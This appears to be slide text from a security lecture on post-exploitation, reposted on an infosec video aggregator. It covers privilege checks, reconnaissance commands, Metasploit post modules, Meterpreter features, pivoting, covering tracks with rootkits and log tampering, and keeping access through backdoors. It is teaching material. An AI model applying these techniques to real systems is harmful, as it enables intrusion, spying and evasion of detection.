Description: Topics covered in this lecture include:
Stages of an attack
Information gathering
Exploitation
Post-exploitation
What an attacker does after exploiting a vulnerability successfully
Possible actions
Information gathering
Find out about the compromised system
Copy data
Make modifications
Further attacks to escalate privileges or attack other connected systems
Denial of service
Impersonation
Possibilities, possibilities
Depends on the goals/motivation of the attacker
Hactivism
Organised crime
Discuss: others?
What is possible will depend on the kind of access the attacker has managed to gain...
Having shell
One of the best results for an attacker, is ending up with shell access
They can then run commands on the remote system
Potentially modify and read files
Got root?
The actions an attacker can take will depend on their security context
Such as, what user they are running as?
What security restrictions are in place?
The most access comes from having superuser access:
On a Windows system: Administrator (SID ends in 500), System
On Unix: Root (UID == 0)
Got root?
Unix commands:
whoami
id {-u}
Access denied
Access controls restrict what each user can do
Most programs should run as a normal user, to prevent misuse
Post-exploitation information gathering
After an attack, the attacker typically wants to know more about the system
View environment variables: env
Post-exploitation information gathering
More examples:
cat /proc/cpuinfo
free -m
df -h
uname -a
Changing attack surface
When an attacker gets access to something new, they then have a different attack surface to examine
For example, a vulnerability that can only be exploited with local access
Maybe able to escalate their privileges further
Local privilege escalation exploits could potentially grant other access
Maybe able to get root via a normal user account
Post-exploitation via MSF
MSF includes post-exploitation modules
For use after a successful attack
Many post-exploitation modules simply take control of a shell, and automate things that an attacker would want to do:
Check whether you are in a VM
Gather information, such as config info, networking, user history, etc
Gather password hashes, for offline password cracking
Advanced payload: Meterpreter
MSF includes an advanced payload: Meterpreter
Originally developed by Matt Miller, AKA Skape
Exists in memory, without touching the disk
Can “migrate” into existing processes, such as svchost.exe or explorer.exe
Traffic between the attacker and the compromised target is encrypted
Meterpreter is a staged payload...
Staged payloads
A single or inline payload is self contained and fits into this space
A staged payload involves a small stager that pulls down the rest of the staged payload, the stage, and executes it
Meterpreter
Meterpreter has lots of advanced features that make life easier for an attacker:
Spyware (keylogging, screen capture)
System commands (ls, ps, getuid, regardless of OS)
Download and upload files
Run post exploitation modules
Pivoting: routing attacks through compromised systems
And if you want a shell, just type “shell”
Other payloads: VNC
VNC is a remote desktop protocol
After a server is installed on a remote system, a client can connect using vncviewer
Reverse connections are also possible
It is possible to configure the client so that it is read only, rather than also taking control of the keyboard and mouse
Pivoting involves routing attacks via a compromised system
The intranet is likely also connected to the server
Methods of pivoting
Covering tracks
An attacker may choose to take actions to avoid being caught...
Install rootkits: modify the system/OS to hide malicious files and processes
Disable, delete, or modify log files
Use anti-forensics
Steganography: hiding information within information (e.g. text in an image file)
Modify timestamps
Zero-out disk contents
Maintaining access
An attacker may want to ensure they can get access later, without using the same exploit...
Add user accounts, perhaps superuser, or some way the attacker can escalate privileges
Leave a backdoor: a method of sending commands or logging on (typically included with a rootkit)
Perhaps a new service, that starts on boot
They may even patch the original security problem, to avoid detection
What would an attacker do?
For More Information Please Visit:- http://z.cliffe.schreuders.org/
Tags:
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.